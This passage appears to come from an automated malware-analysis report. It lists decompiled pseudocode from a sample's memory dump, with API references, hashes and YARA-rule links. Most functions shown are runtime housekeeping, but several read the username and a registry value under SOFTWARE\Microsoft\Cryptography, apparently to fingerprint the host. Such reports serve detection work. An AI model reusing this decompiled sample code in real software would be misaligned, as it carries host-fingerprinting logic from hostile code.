					} while ( *0x41c030 != 0);
					goto L3;
				}
			}

0x0040340b
0x00403423
0x0040342a
0x0040342c
0x00403431
0x00403438
0x00403438
0x00000000
0x0040343d
0x00403441
0x0040344a
0x0040344a
0x0040344d
0x00403456
0x0040345d
0x00403462
0x00403464
0x00403469
0x0040346c
0x0040346c
0x0040346f
0x00403472
0x00403479
0x00403479
0x00403472
0x00403462
0x0040347e
0x00403487
0x00403489
0x00403489
0x00403490
0x00403492
0x00403492
0x0040349a
0x004034a3
0x004034a5
0x004034a5
0x004034ae
0x004034ae
0x004034bf
0x004034bf
0x004034c1
0x004034c1
0x00403412
0x00403412
0x00403418
0x0040341c
0x0040341e
0x00000000
0x00403412

APIs

FreeLibrary.KERNEL32(00400000,?,?,?,00000002,004034D6,004025CB,0040260E,?,00000000,00402568,?,00403505,?,004186F7,00000000), ref: 00403479
ExitProcess.KERNEL32(00000000,?,?,?,00000002,004034D6,004025CB,0040260E,?,00000000,00402568,?,00403505,?,004186F7,00000000), ref: 004034AE

Memory Dump Source

Source File: 00000000.00000002.544349565.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ExitFreeLibraryProcess
String ID:
API String ID: 1404682716-0
Opcode ID: 83c72d89bf64d36d3e307e14c4e851507ac80ccff3e714fe6ab68af5963cad7f
Instruction ID: 3efb88752543cb7b7411b8850ba760202313331cae5217d67b69a3078a3e17bb
Opcode Fuzzy Hash: 83c72d89bf64d36d3e307e14c4e851507ac80ccff3e714fe6ab68af5963cad7f
Instruction Fuzzy Hash: 772162709002408BDB229F6684847577FD9AB49356F2585BBE844AF2C6D77CCEC0C7AD

Uniqueness

Uniqueness Score: -1.00%

Function 004033EC, Relevance: 3.1, APIs: 2, Instructions: 66
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E004033EC() {
				intOrPtr* _t13;
				struct HINSTANCE__* _t27;
				void* _t36;
				intOrPtr _t39;
				void* _t52;

				 *((intOrPtr*)(_t13 +  *_t13)) =  *((intOrPtr*)(_t13 +  *_t13)) + _t13 +  *_t13;
				if( *0x0041C650 != 0 ||  *0x41c030 == 0) {
					L5:
					if( *0x41b004 != 0) {
						E004032DC();
						E00403368(_t36);
						 *0x41b004 = 0;
					}
					L7:
					if( *((char*)(0x41c650)) == 2 &&  *0x41b000 == 0) {
						 *0x0041C634 = 0;
					}
					E004031DC();
					if( *((char*)(0x41c650)) <= 1 ||  *0x41b000 != 0) {
						_t17 =  *0x0041C638;
						if( *0x0041C638 != 0) {
							E004048EC(_t17);
							_t39 =  *((intOrPtr*)(0x41c638));
							_t7 = _t39 + 0x10; // 0x0
							_t27 =  *_t7;
							_t8 = _t39 + 4; // 0x400000
							if(_t27 !=  *_t8 && _t27 != 0) {
								FreeLibrary(_t27);
							}
						}
					}
					E004031B4();
					if( *((char*)(0x41c650)) == 1) {
						 *0x0041C64C();
					}
					if( *((char*)(0x41c650)) != 0) {
						E00403338();
					}
					if( *0x41c628 == 0) {
						if( *0x41c018 != 0) {
							 *0x41c018();
						}
						ExitProcess( *0x41b000); // executed
					}
					memcpy(0x41c628,  *0x41c628, 0xb << 2);
					_t52 = _t52 + 0xc;
					0x41b000 = 0x41b000;
					goto L7;
				} else {
					do {
						 *0x41c030 = 0;
						 *((intOrPtr*)( *0x41c030))();
					} while ( *0x41c030 != 0);
					goto L5;
				}
			}

0x004033ee
0x0040340b
0x00403423
0x0040342a
0x0040342c
0x00403431
0x00403438
0x00403438
0x0040343d
0x00403441
0x0040344a
0x0040344a
0x0040344d
0x00403456
0x0040345d
0x00403462
0x00403464
0x00403469
0x0040346c
0x0040346c
0x0040346f
0x00403472
0x00403479
0x00403479
0x00403472
0x00403462
0x0040347e
0x00403487
0x00403489
0x00403489
0x00403490
0x00403492
0x00403492
0x0040349a
0x004034a3
0x004034a5
0x004034a5
0x004034ae
0x004034ae
0x004034bf
0x004034bf
0x004034c1
0x00000000
0x00403412
0x00403412
0x00403418
0x0040341c
0x0040341e
0x00000000
0x00403412

APIs

FreeLibrary.KERNEL32(00400000,?,?,?,00000002,004034D6,004025CB,0040260E,?,00000000,00402568,?,00403505,?,004186F7,00000000), ref: 00403479
ExitProcess.KERNEL32(00000000,?,?,?,00000002,004034D6,004025CB,0040260E,?,00000000,00402568,?,00403505,?,004186F7,00000000), ref: 004034AE

Memory Dump Source

Source File: 00000000.00000002.544349565.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ExitFreeLibraryProcess
String ID:
API String ID: 1404682716-0
Opcode ID: 712c545abaf320befb2a29c50df4fdabf10e6ed2be12c49fdfa7e8256cdbd3e8
Instruction ID: a7f10c8a2f0efa7893578dab7d1fe92da90b98ef6ff2cf319ec6d8299990f2f9
Opcode Fuzzy Hash: 712c545abaf320befb2a29c50df4fdabf10e6ed2be12c49fdfa7e8256cdbd3e8
Instruction Fuzzy Hash: 922132709002408FDB229F6584847567FA9AF49316F1585BBE844AE2D6D77CCAC0C79D

Uniqueness

Uniqueness Score: -1.00%

Function 004033F0, Relevance: 3.1, APIs: 2, Instructions: 64
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E004033F0() {
				struct HINSTANCE__* _t26;
				void* _t35;
				intOrPtr _t38;
				void* _t51;

				if( *0x0041C650 != 0 ||  *0x41c030 == 0) {
					L4:
					if( *0x41b004 != 0) {
						E004032DC();
						E00403368(_t35);
						 *0x41b004 = 0;
					}
					L6:
					if( *((char*)(0x41c650)) == 2 &&  *0x41b000 == 0) {
						 *0x0041C634 = 0;
					}
					E004031DC();
					if( *((char*)(0x41c650)) <= 1 ||  *0x41b000 != 0) {
						_t16 =  *0x0041C638;
						if( *0x0041C638 != 0) {
							E004048EC(_t16);
							_t38 =  *((intOrPtr*)(0x41c638));
							_t7 = _t38 + 0x10; // 0x0
							_t26 =  *_t7;
							_t8 = _t38 + 4; // 0x400000
							if(_t26 !=  *_t8 && _t26 != 0) {
								FreeLibrary(_t26);
							}
						}
					}
					E004031B4();
					if( *((char*)(0x41c650)) == 1) {
						 *0x0041C64C();
					}
					if( *((char*)(0x41c650)) != 0) {
						E00403338();
					}
					if( *0x41c628 == 0) {
						if( *0x41c018 != 0) {
							 *0x41c018();
						}
						ExitProcess( *0x41b000); // executed
					}
					memcpy(0x41c628,  *0x41c628, 0xb << 2);
					_t51 = _t51 + 0xc;
					0x41b000 = 0x41b000;
					goto L6;
				} else {
					do {
						 *0x41c030 = 0;
						 *((intOrPtr*)( *0x41c030))();
					} while ( *0x41c030 != 0);
					goto L4;
				}
			}

0x0040340b
0x00403423
0x0040342a
0x0040342c
0x00403431
0x00403438
0x00403438
0x0040343d
0x00403441
0x0040344a
0x0040344a
0x0040344d
0x00403456
0x0040345d
0x00403462
0x00403464
0x00403469
0x0040346c
0x0040346c
0x0040346f
0x00403472
0x00403479
0x00403479
0x00403472
0x00403462
0x0040347e
0x00403487
0x00403489
0x00403489
0x00403490
0x00403492
0x00403492
0x0040349a
0x004034a3
0x004034a5
0x004034a5
0x004034ae
0x004034ae
0x004034bf
0x004034bf
0x004034c1
0x00000000
0x00403412
0x00403412
0x00403418
0x0040341c
0x0040341e
0x00000000
0x00403412

APIs

FreeLibrary.KERNEL32(00400000,?,?,?,00000002,004034D6,004025CB,0040260E,?,00000000,00402568,?,00403505,?,004186F7,00000000), ref: 00403479
ExitProcess.KERNEL32(00000000,?,?,?,00000002,004034D6,004025CB,0040260E,?,00000000,00402568,?,00403505,?,004186F7,00000000), ref: 004034AE

Memory Dump Source

Source File: 00000000.00000002.544349565.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ExitFreeLibraryProcess
String ID:
API String ID: 1404682716-0
Opcode ID: 1d3e21be2f222e88a5ce5129c4af818b1f382a2d1c87c05034a25e8df98eeb83
Instruction ID: 9b75380a0c1bb1c5ffdc64597b03c40b9c34cb72d282d073c18e6e74c6ec6d76
Opcode Fuzzy Hash: 1d3e21be2f222e88a5ce5129c4af818b1f382a2d1c87c05034a25e8df98eeb83
Instruction Fuzzy Hash: F42141709002408BDB229F6684847567FA9AF49316F2585BBE844AE2C6D77CCAC0CB9D

Uniqueness

Uniqueness Score: -1.00%

Function 00406E68, Relevance: 3.1, APIs: 2, Instructions: 58
registryCOMMON

Download Yara Rule

C-Code - Quality: 65%

			E00406E68(void* __eax, void* __ebx, char __ecx, char __edx, intOrPtr _a4) {
				char _v8;
				char _v12;
				int _v16;
				int _v20;
				void* _v24;
				char _v536;
				void* _t18;
				intOrPtr _t52;
				void* _t56;

				_t18 = __eax - 0x55000000;
				_v12 = __ecx;
				_v8 = __edx;
				E00404150( &_v8);
				E00404150( &_v12);
				_push(_t56);
				_push(0x406f1f);
				_push( *[fs:eax]);
				 *[fs:eax] = _t56 + 0xfffffdec;
				_v20 = 0xfe;
				_v536 = 0;
				RegOpenKeyExW(_t18, E00403D98(_v8), 0, 0x20119,  &_v24); // executed
				RegQueryValueExW(_v24, E00403D98(_v12), 0,  &_v16,  &_v536,  &_v20); // executed
				E00403D6C(_a4, 0x100,  &_v536);
				_pop(_t52);
				 *[fs:eax] = _t52;
				_push(E00406F26);
				return E00403BF4( &_v12, 2);
			}

0x00406e68
0x00406e76
0x00406e79
0x00406e81
0x00406e89
0x00406e90
0x00406e91
0x00406e96
0x00406e99
0x00406e9c
0x00406ea3
0x00406ec8
0x00406eef
0x00406eff
0x00406f06
0x00406f09
0x00406f0c
0x00406f1e

APIs

Part of subcall function 00404150: SysAllocStringLen.OLEAUT32(SOFTWARE\Microsoft\Cryptography,?), ref: 0040415E

RegOpenKeyExW.KERNEL32(80000002,00000000,00000000,00020119,?), ref: 00406EC8
RegQueryValueExW.KERNEL32(?,00000000,00000000,00000000,00000000,000000FE), ref: 00406EEF

Part of subcall function 00403BF4: SysFreeString.OLEAUT32(?), ref: 00403C07

Memory Dump Source

Source File: 00000000.00000002.544349565.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: String$AllocFreeOpenQueryValue
String ID:
API String ID: 967375698-0
Opcode ID: 75d402b96af35ef4be622c85e7f42c5874bf5a9438753516473e280561b1ff26
Instruction ID: 95dba4e9abc9c412b13e6587c625634e660d61312d90d7235186b1c7fae4ad03
Opcode Fuzzy Hash: 75d402b96af35ef4be622c85e7f42c5874bf5a9438753516473e280561b1ff26
Instruction Fuzzy Hash: DB114970600209AFD700EF98D992ADEBBFCEF48704F4000B6B508E7291E774AB448BA5

Uniqueness

Uniqueness Score: -1.00%

Function 00406E6C, Relevance: 3.1, APIs: 2, Instructions: 58
registryCOMMON

Download Yara Rule

C-Code - Quality: 65%

			E00406E6C(void* __eax, void* __ebx, char __ecx, char __edx, intOrPtr _a4) {
				char _v8;
				char _v12;
				int _v16;
				int _v20;
				void* _v24;
				char _v536;
				void* _t44;
				intOrPtr _t51;
				void* _t55;

				_v12 = __ecx;
				_v8 = __edx;
				_t44 = __eax;
				E00404150( &_v8);
				E00404150( &_v12);
				_push(_t55);
				_push(0x406f1f);
				_push( *[fs:eax]);
				 *[fs:eax] = _t55 + 0xfffffdec;
				_v20 = 0xfe;
				_v536 = 0;
				RegOpenKeyExW(_t44, E00403D98(_v8), 0, 0x20119,  &_v24); // executed
				RegQueryValueExW(_v24, E00403D98(_v12), 0,  &_v16,  &_v536,  &_v20); // executed
				E00403D6C(_a4, 0x100,  &_v536);
				_pop(_t51);
				 *[fs:eax] = _t51;
				_push(E00406F26);
				return E00403BF4( &_v12, 2);
			}

0x00406e76
0x00406e79
0x00406e7c
0x00406e81
0x00406e89
0x00406e90
0x00406e91
0x00406e96
0x00406e99
0x00406e9c
0x00406ea3
0x00406ec8
0x00406eef
0x00406eff
0x00406f06
0x00406f09
0x00406f0c
0x00406f1e

APIs

Part of subcall function 00404150: SysAllocStringLen.OLEAUT32(SOFTWARE\Microsoft\Cryptography,?), ref: 0040415E

RegOpenKeyExW.KERNEL32(80000002,00000000,00000000,00020119,?), ref: 00406EC8
RegQueryValueExW.KERNEL32(?,00000000,00000000,00000000,00000000,000000FE), ref: 00406EEF

Part of subcall function 00403BF4: SysFreeString.OLEAUT32(?), ref: 00403C07

Memory Dump Source

Source File: 00000000.00000002.544349565.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: String$AllocFreeOpenQueryValue
String ID:
API String ID: 967375698-0
Opcode ID: 93ffc18aff940630c773c39f869c9b73eb077ec6050040de7a5362879dcd2ece
Instruction ID: d6839de15ce0d986496e2f56cedbfcdd5c795bc72117923b9a37f873fbd9eab1
Opcode Fuzzy Hash: 93ffc18aff940630c773c39f869c9b73eb077ec6050040de7a5362879dcd2ece
Instruction Fuzzy Hash: E0111971640209AFD700EB99DD86EDEBBFCEF48704F5000B6B508E7291DB74AB448A65

Uniqueness

Uniqueness Score: -1.00%

Function 004011E4, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 34
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004011E4() {
				intOrPtr* _t4;
				void* _t5;
				void _t6;
				intOrPtr* _t9;
				void* _t12;
				void* _t14;

				if( *0x41c5d0 != 0) {
					L5:
					_t4 =  *0x41c5d0;
					 *0x41c5d0 =  *_t4;
					return _t4;
				} else {
					_t5 = LocalAlloc(0, 0x644); // executed
					_t12 = _t5;
					if(_t12 != 0) {
						_t6 =  *0x41c5cc; // 0x0
						 *_t12 = _t6;
						 *0x41c5cc = _t12;
						_t14 = 0;
						do {
							_t2 = (_t14 + _t14) * 8; // 0x4
							_t9 = _t12 + _t2 + 4;
							 *_t9 =  *0x41c5d0;
							 *0x41c5d0 = _t9;
							_t14 = _t14 + 1;
						} while (_t14 != 0x64);
						goto L5;
					} else {
						return 0;
					}
				}
			}

0x004011ee
0x0040122a
0x0040122a
0x0040122e
0x00401232
0x004011f0
0x004011f7
0x004011fc
0x00401200
0x00401207
0x0040120c
0x0040120e
0x00401214
0x00401216
0x0040121a
0x0040121a
0x00401220
0x00401222
0x00401224
0x00401225
0x00000000
0x00401202
0x00401206
0x00401206
0x00401200

APIs

LocalAlloc.KERNEL32(00000000,00000644,?,0041C5D4,00401247,?,?,00401447,?,00100000,00002000,00000004,0041C5E4,?,?), ref: 004011F7

Strings

LEq, xrefs: 004011E6

Memory Dump Source

Source File: 00000000.00000002.544349565.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AllocLocal
String ID: LEq
API String ID: 3494564517-751654748
Opcode ID: 1d034d2b76be25e021de9249ef1b5bcb9b446cb3610b695d9b1e5c5957ac038c
Instruction ID: 1b97f869ca2ef78b7edf313f24570502d3759f43221a4d236e640dffafdc993f
Opcode Fuzzy Hash: 1d034d2b76be25e021de9249ef1b5bcb9b446cb3610b695d9b1e5c5957ac038c
Instruction Fuzzy Hash: 5FF05E727402119FD714CF69D8806A577E6EBAD315F20847ED185E77A0E635AC418B48

Uniqueness

Uniqueness Score: -1.00%

Function 00401388, Relevance: 2.5, APIs: 2, Instructions: 37
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00401388(void* __eax, void** __edx) {
				void* _t3;
				void** _t8;
				void* _t11;
				long _t14;

				_t8 = __edx;
				if(__eax >= 0x100000) {
					_t14 = __eax + 0x0000ffff & 0xffff0000;
				} else {
					_t14 = 0x100000;
				}
				_t8[1] = _t14;
				_t3 = VirtualAlloc(0, _t14, 0x2000, 1); // executed
				_t11 = _t3;
				 *_t8 = _t11;
				if(_t11 != 0) {
					_t3 = E0040123C(0x41c5d4, _t8);
					if(_t3 == 0) {
						VirtualFree( *_t8, 0, 0x8000);
						 *_t8 = 0;
						return 0;
					}
				}
				return _t3;
			}

0x0040138b
0x00401395
0x004013a4
0x00401397
0x00401397
0x00401397
0x004013aa
0x004013b7
0x004013bc
0x004013be
0x004013c2
0x004013cb
0x004013d2
0x004013de
0x004013e5
0x00000000
0x004013e5
0x004013d2
0x004013ea

APIs

VirtualAlloc.KERNEL32(00000000,?,00002000,00000001,?,?,?,00401691), ref: 004013B7
VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,?,00002000,00000001,?,?,?,00401691), ref: 004013DE

Memory Dump Source

Source File: 00000000.00000002.544349565.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Virtual$AllocFree
String ID:
API String ID: 2087232378-0
Opcode ID: b25dbc278243e52bedcd7f6d8fef46cdb2f3eea21510b30c666f455eef3dc6e8
Instruction ID: a459bd48843060549903651ed84add4fd647ab7a4347e8b1aec55fdbd67c2c02
Opcode Fuzzy Hash: b25dbc278243e52bedcd7f6d8fef46cdb2f3eea21510b30c666f455eef3dc6e8
Instruction Fuzzy Hash: 72F0E972B0032017EB2055690CC1F5265C58B46760F14417BBE08FF7D9C6758C008299

Uniqueness

Uniqueness Score: -1.00%

Function 004A05DB, Relevance: 1.6, APIs: 1, Instructions: 56libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?,?,00000000,?,?,?,004A0327,2B14D0EE,?), ref: 004A0607

Memory Dump Source

Source File: 00000000.00000002.544445284.00000000004A0000.00000040.00000001.sdmp, Offset: 004A0000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 76b35eb126b5d398c3241770d81ee5b7efebad686aa1f8164dd06303da8c9cbe
Instruction ID: 5acd792fe4fe10f15044d530c193d518b97ccb0a94a73e11786566b3fd699169
Opcode Fuzzy Hash: 76b35eb126b5d398c3241770d81ee5b7efebad686aa1f8164dd06303da8c9cbe
Instruction Fuzzy Hash: B4113C76600215AFDF10CF19C880A6A77A8FFA976C7198066EC59DB302D774FD21CB98

Uniqueness

Uniqueness Score: -1.00%

Function 004065E8, Relevance: 1.5, APIs: 1, Instructions: 22
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004065E8(intOrPtr* __eax) {
				short _v516;
				signed int _t4;
				signed int _t5;
				int _t9;
				void* _t11;
				signed int _t14;
				void* _t18;
				DWORD* _t19;

				_t4 = __eax +  *__eax;
				 *_t4 =  *_t4 + _t4;
				_t5 = _t4 | 0x5300000a;
				_t19 = _t18 + 0xfffffdfc;
				_t14 = _t5;
				 *_t19 = 0xff;
				_t9 = GetUserNameW( &_v516, _t19); // executed
				if(_t9 == 0) {
					_t11 = E00403BDC(_t14);
				} else {
					_t11 = E00403D6C(_t14, 0x100,  &_v516);
				}
				return _t11;
			}

0x004065e8
0x004065ea
0x004065ec
0x004065f1
0x004065f7
0x004065f9
0x0040660d
0x00406611
0x00406627
0x00406613
0x0040661e
0x0040661e
0x00406633

APIs

GetUserNameW.ADVAPI32(?,?,?,00406D53,00000000,00406E52,?,?,?,00000006,00000000,00000000,?,0041872E,?), ref: 0040660D

Memory Dump Source

Source File: 00000000.00000002.544349565.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: NameUser
String ID:
API String ID: 2645101109-0
Opcode ID: 153b4ec9fa6da1239e45f29a021cf1180a625503ea610292dda7591db46c391b
Instruction ID: 5a5990060c673b8f00593b581c9a0ee3644ab744bab1f058c1932740bd518d27
Opcode Fuzzy Hash: 153b4ec9fa6da1239e45f29a021cf1180a625503ea610292dda7591db46c391b
Instruction Fuzzy Hash: 1BE0DFB12083424FC3119BA8D880AA53BE49F49300F044876B8D5C72E1FE35CE248753

Uniqueness

Uniqueness Score: -1.00%

Function 004065EC, Relevance: 1.5, APIs: 1, Instructions: 20
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004065EC(signed int __eax) {
				short _v516;
				signed int _t4;
				int _t8;
				void* _t10;
				signed int _t13;
				void* _t17;
				DWORD* _t18;

				_t4 = __eax | 0x5300000a;
				_t18 = _t17 + 0xfffffdfc;
				_t13 = _t4;
				 *_t18 = 0xff;
				_t8 = GetUserNameW( &_v516, _t18); // executed
				if(_t8 == 0) {
					_t10 = E00403BDC(_t13);
				} else {
					_t10 = E00403D6C(_t13, 0x100,  &_v516);
				}
				return _t10;
			}

0x004065ec
0x004065f1
0x004065f7
0x004065f9
0x0040660d
0x00406611
0x00406627
0x00406613
0x0040661e
0x0040661e
0x00406633

APIs

GetUserNameW.ADVAPI32(?,?,?,00406D53,00000000,00406E52,?,?,?,00000006,00000000,00000000,?,0041872E,?), ref: 0040660D

Memory Dump Source

Source File: 00000000.00000002.544349565.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: NameUser
String ID:
API String ID: 2645101109-0
Opcode ID: 60f9d436da294c5ff49d132d20e00676374c28b1533c3170959a1c115f4756e2
Instruction ID: 7803372b71e91cd4900786e151d6695f3fca8b78fda9d7e8201226f5ab6c0eae
Opcode Fuzzy Hash: 60f9d436da294c5ff49d132d20e00676374c28b1533c3170959a1c115f4756e2
Instruction Fuzzy Hash: D7E08CB16043065BD3109AA8D880AAA76E89B88300F00493AB89AD73D0FE39CE248647

Uniqueness

Uniqueness Score: -1.00%

Function 00403604, Relevance: 1.5, APIs: 1, Instructions: 15
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00403604(char* __eax, short* __ecx, int __edx, int _a4) {
				int _t4;
				int _t5;

				_t4 =  *0x41c5a8; // 0x3
				_t5 = WideCharToMultiByte(_t4, 0, __ecx, _a4, __eax, __edx, 0, 0); // executed
				return _t5;
			}

0x00403614
0x0040361a
0x00403620

APIs

WideCharToMultiByte.KERNEL32(00000003,00000000,?,?,00000000,00000001,00000000,00000000,00000001,004036B0,00000000), ref: 0040361A

Memory Dump Source

Source File: 00000000.00000002.544349565.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ByteCharMultiWide
String ID:
API String ID: 626452242-0
Opcode ID: 561e95d8c0e043bb599fe2914a8b8ce540b10e76985e8275bf81900a008061d5
Instruction ID: 7e1ccd6cea493bd3454663dff710d39ec61ca1bdc7a044e150527f2c3e7482f1
Opcode Fuzzy Hash: 561e95d8c0e043bb599fe2914a8b8ce540b10e76985e8275bf81900a008061d5
Instruction Fuzzy Hash: 1EC002B22802087FE5149A9ADC46FA7769C9758B50F108029B7089E1D1D5A5B85046BC

Uniqueness

Uniqueness Score: -1.00%

Function 00401464, Relevance: 1.3, APIs: 1, Instructions: 62
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00401464(void* __eax, intOrPtr* __ecx, intOrPtr __edx) {
				intOrPtr _v20;
				intOrPtr _v24;
				void* _v28;
				intOrPtr* _v32;
				intOrPtr* _t24;
				intOrPtr _t27;
				intOrPtr _t31;
				int _t32;
				intOrPtr* _t35;
				intOrPtr* _t42;
				void* _t43;
				void* _t44;
				intOrPtr* _t45;

				_t45 =  &_v20;
				_v32 = __ecx;
				 *_t45 = __edx;
				_v28 = 0xffffffff;
				_v24 = 0;
				_t44 = __eax;
				_v20 =  *_t45 + __eax;
				_t35 =  *0x41c5d4; // 0x41c5d4
				while(_t35 != 0x41c5d4) {
					_t42 =  *_t35;
					_t5 = _t35 + 8; // 0x0
					_t43 =  *_t5;
					if(_t44 <= _t43) {
						_t6 = _t35 + 0xc; // 0x0
						if(_t43 +  *_t6 <= _v20) {
							if(_t43 < _v28) {
								_v28 = _t43;
							}
							_t10 = _t35 + 0xc; // 0x0
							_t31 = _t43 +  *_t10;
							if(_t31 > _v24) {
								_v24 = _t31;
							}
							_t32 = VirtualFree(_t43, 0, 0x8000); // executed
							if(_t32 == 0) {
								 *0x41c5b0 = 1;
							}
							E0040126C(_t35);
						}
					}
					_t35 = _t42;
				}
				_t24 = _v32;
				 *_t24 = 0;
				if(_v24 == 0) {
					return _t24;
				}
				 *_v32 = _v28;
				_t27 = _v24 - _v28;
				 *((intOrPtr*)(_v32 + 4)) = _t27;
				return _t27;
			}

0x00401468
0x0040146b
0x0040146f
0x00401472
0x0040147c
0x00401480
0x00401487
0x0040148b
0x004014e4
0x00401493
0x00401495
0x00401495
0x0040149a
0x0040149e
0x004014a5
0x004014ab
0x004014ad
0x004014ad
0x004014b3
0x004014b3
0x004014ba
0x004014bc
0x004014bc
0x004014c8
0x004014cf
0x004014d1
0x004014d1
0x004014dd
0x004014dd
0x004014a5
0x004014e2
0x004014e2
0x004014ec
0x004014f2
0x004014f9
0x0040151b
0x0040151b
0x00401503
0x00401509
0x00401511
0x00000000

APIs

VirtualFree.KERNEL32(FFFFFFFF,00000000,00008000), ref: 004014C8

Memory Dump Source

Source File: 00000000.00000002.544349565.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: 8487bf62bb6a208eaaff7636571d42378b79c596feb4fea81bccde4a3e3226a5
Instruction ID: bdb72b2e4f8392e9a4367bae485781504843fed35f2e07c9585e1bdde9d69fdb
Opcode Fuzzy Hash: 8487bf62bb6a208eaaff7636571d42378b79c596feb4fea81bccde4a3e3226a5
Instruction Fuzzy Hash: 2621F770608710AFC710DF19C8C0A5BBBE5EF85760F14C96AE4989B3A5D378EC41CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 0040151C, Relevance: 1.3, APIs: 1, Instructions: 54
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040151C(signed int __eax, void** __ecx, intOrPtr __edx) {
				signed int _v20;
				void** _v24;
				void* _t15;
				void** _t16;
				void* _t17;
				signed int _t27;
				intOrPtr* _t29;
				void* _t31;
				intOrPtr* _t32;

				_v24 = __ecx;
				 *_t32 = __edx;
				_t31 = __eax & 0xfffff000;
				_v20 = __eax +  *_t32 + 0x00000fff & 0xfffff000;
				 *_v24 = _t31;
				_t15 = _v20 - _t31;
				_v24[1] = _t15;
				_t29 =  *0x41c5d4; // 0x41c5d4
				while(_t29 != 0x41c5d4) {
					_t7 = _t29 + 8; // 0x0
					_t17 =  *_t7;
					_t8 = _t29 + 0xc; // 0x0
					_t27 =  *_t8 + _t17;
					if(_t31 > _t17) {
						_t17 = _t31;
					}
					if(_t27 > _v20) {
						_t27 = _v20;
					}
					if(_t27 > _t17) {
						_t15 = VirtualAlloc(_t17, _t27 - _t17, 0x1000, 4); // executed
						if(_t15 == 0) {
							_t16 = _v24;
							 *_t16 = 0;
							return _t16;
						}
					}
					_t29 =  *_t29;
				}
				return _t15;
			}

0x00401523
0x00401527
0x0040152e
0x00401543
0x0040154b
0x00401551
0x00401557
0x0040155a
0x0040159e
0x00401562
0x00401562
0x00401565
0x00401568
0x0040156c
0x0040156e
0x0040156e
0x00401574
0x00401576
0x00401576
0x0040157c
0x00401589
0x00401590
0x00401592
0x00401598
0x00000000
0x00401598
0x00401590
0x0040159c
0x0040159c
0x004015ad

APIs

VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 00401589

Memory Dump Source

Source File: 00000000.00000002.544349565.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 87944e6d7ec2424c7827a654054cf40cbadd8ec593a4801b2f8f16170b9bc70d
Instruction ID: d2e5847c23a0d0fb2b7a3dff60909d67c0489ed435542f313e0fa7b23e2e95f5
Opcode Fuzzy Hash: 87944e6d7ec2424c7827a654054cf40cbadd8ec593a4801b2f8f16170b9bc70d
Instruction Fuzzy Hash: 67115E72A44701AFC3109E29CC80A6BBBE2EBC4750F15C539E5996B3A5D734AC408B89

Uniqueness

Uniqueness Score: -1.00%

Function 004015B0, Relevance: 1.3, APIs: 1, Instructions: 48
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E004015B0(void* __eax, void** __ecx, void* __edx) {
				int _t7;
				void* _t9;
				signed int _t14;
				intOrPtr* _t19;
				signed int _t22;
				void** _t23;

				_push(__ecx);
				 *_t23 = __eax + 0x00000fff & 0xfffff000;
				_t22 = __eax + __edx & 0xfffff000;
				 *__ecx =  *_t23;
				_t7 = _t22 -  *_t23;
				__ecx[1] = _t7;
				_t19 =  *0x41c5d4; // 0x41c5d4
				while(_t19 != 0x41c5d4) {
					_t2 = _t19 + 8; // 0x0
					_t9 =  *_t2;
					_t3 = _t19 + 0xc; // 0x0
					_t14 =  *_t3 + _t9;
					if(_t9 <  *_t23) {
						_t9 =  *_t23;
					}
					if(_t22 < _t14) {
						_t14 = _t22;
					}
					if(_t14 > _t9) {
						_t7 = VirtualFree(_t9, _t14 - _t9, 0x4000); // executed
						if(_t7 == 0) {
							 *0x41c5b0 = 2;
						}
					}
					_t19 =  *_t19;
				}
				return _t7;
			}

0x004015b4
0x004015c5
0x004015cc
0x004015d5
0x004015d9
0x004015dc
0x004015df
0x0040161f
0x004015e7
0x004015e7
0x004015ea
0x004015ed
0x004015f2
0x004015f4
0x004015f4
0x004015f9
0x004015fb
0x004015fb
0x004015ff
0x0040160a
0x00401611
0x00401613
0x00401613
0x00401611
0x0040161d
0x0040161d
0x0040162c

APIs

VirtualFree.KERNEL32(00000000,00000000,00004000,?,0000000C,?,-00000008,00003FFB,00401817), ref: 0040160A

Memory Dump Source

Source File: 00000000.00000002.544349565.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: 3bfc56920760e5136ff02f6c94c05418cc55e2be2e85163925a7dedac6e01034
Instruction ID: 104411973d7795ae4b76250d277c099600c8cf09cd5a8da0f47b470ca133b76a
Opcode Fuzzy Hash: 3bfc56920760e5136ff02f6c94c05418cc55e2be2e85163925a7dedac6e01034
